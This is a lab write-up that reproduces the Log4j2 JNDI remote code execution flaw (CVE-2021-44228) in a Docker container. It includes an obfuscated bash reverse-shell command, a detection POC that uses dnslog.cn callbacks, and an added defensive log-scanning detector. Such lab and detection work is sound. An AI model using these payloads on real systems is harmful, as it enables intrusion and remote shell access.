Environment setup:
Pull the image with docker:
[root@www /]# docker pull vulfocus/log4j2-rce-2021-12-09
Run it:
[root@www /]# docker run -P vulfocus/log4j2-rce-2021-12-09
Check the mapped port:
[root@www ]# docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
4143c7d55448 vulfocus/log4j2-rce-2021-12-09 "java -jar /demo/dem…" 20 seconds ago Up 19 seconds 0.0.0.0:51832->8080/tcp, :::51832->8080/tcp happy_wescoff
Once the environment is up, send a POST request to http://your-ip:port and you will see the page.
Vulnerability reproduction:
Reverse shell:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMzLjExLzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "192.168.33.11"
Depending on your Java version, it is best to try each one several times; I used java 1.8.0_202.
Tool address:
https://github.com/welk1n/JNDI-Injection-Exploit
Writing the POC:
import requests, random, time

url = "http://192.168.33.172:51832/hello"

def poc():
    try:
        session = requests.session()
        # Ask dnslog.cn for a fresh subdomain; the random query parameter only defeats caching
        ret = session.get("http://www.dnslog.cn/getdomain.php?t=" + str(random.randint(100000, 999999)),
                          timeout=20).text
        # Log4j lookup string pointing at that subdomain; a vulnerable target resolves it
        poc = "${jndi:ldap://%s/}" % ret
        data = {"payload": f"{poc}"}
        requests.post(url, data=data)
        # Give the target time to perform the DNS lookup before checking the records
        time.sleep(5)
        ret2 = session.get("http://www.dnslog.cn/getrecords.php?t=" + str(random.randint(100000, 999999)),
                           timeout=20).text
        if ret in ret2:
            print(f"{url} 存在Apache Log4j2远程代码执行漏洞 CVE-2021-44228")
    except requests.RequestException:
        # Network errors (timeout, connection refused) are treated as "not confirmed"
        pass

poc()
Running result:
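As a defender-side counterpart to the POC above, here is an added example (not part of the original post or the tool it uses) that scans web access-log lines for the ${jndi:scheme://host/} lookup string the POC sends, URL-decoding the query string first, and reports the scheme and callback host. The sample log lines and the hosts in them are constructed.

```python
import re
from urllib.parse import unquote

# A Log4j lookup that starts a JNDI lookup, e.g. ${jndi:ldap://host/...}
# group 1 = scheme (ldap, rmi, dns, ...), group 2 = host without port or path
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:\s*//\s*([^/:\s}]+)[^}]*\}", re.IGNORECASE)


def find_jndi_lookups(text):
    """Return (scheme, host) tuples for every ${jndi:...} lookup in text.

    The text is URL-decoded repeatedly (up to three rounds) so that a payload that
    was percent-encoded once or twice in a query string is still recognised."""
    decoded = text
    for _ in range(3):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return [(m.group(1).lower(), m.group(2)) for m in JNDI_RE.finditer(decoded)]


def scan_log(lines):
    """Scan access-log lines; return one dict per lookup found, with the 1-based line number."""
    hits = []
    for n, line in enumerate(lines, 1):
        for scheme, host in find_jndi_lookups(line):
            hits.append({"line": n, "scheme": scheme, "host": host})
    return hits


# Constructed sample lines: a GET with the lookup percent-encoded in the query string,
# a logged POST body as the lab POC sends it, and a benign request.
SAMPLE_LINES = [
    '192.168.33.11 - - [09/Dec/2021:10:00:01 +0000] "GET /hello?payload=%24%7Bjndi%3Aldap%3A%2F%2Fabc123.dnslog.cn%2F%7D HTTP/1.1" 200 12',
    '192.168.33.11 - - [09/Dec/2021:10:00:05 +0000] "POST /hello HTTP/1.1" 200 12 body="payload=${jndi:ldap://192.168.33.11:1389/a}"',
    '10.0.0.5 - - [09/Dec/2021:10:00:09 +0000] "GET /hello?payload=hello%20world HTTP/1.1" 200 12',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LINES):
        print(hit)
```

The reported host is the callback the target would contact, which is the value worth blocking at the egress firewall and matching against DNS logs.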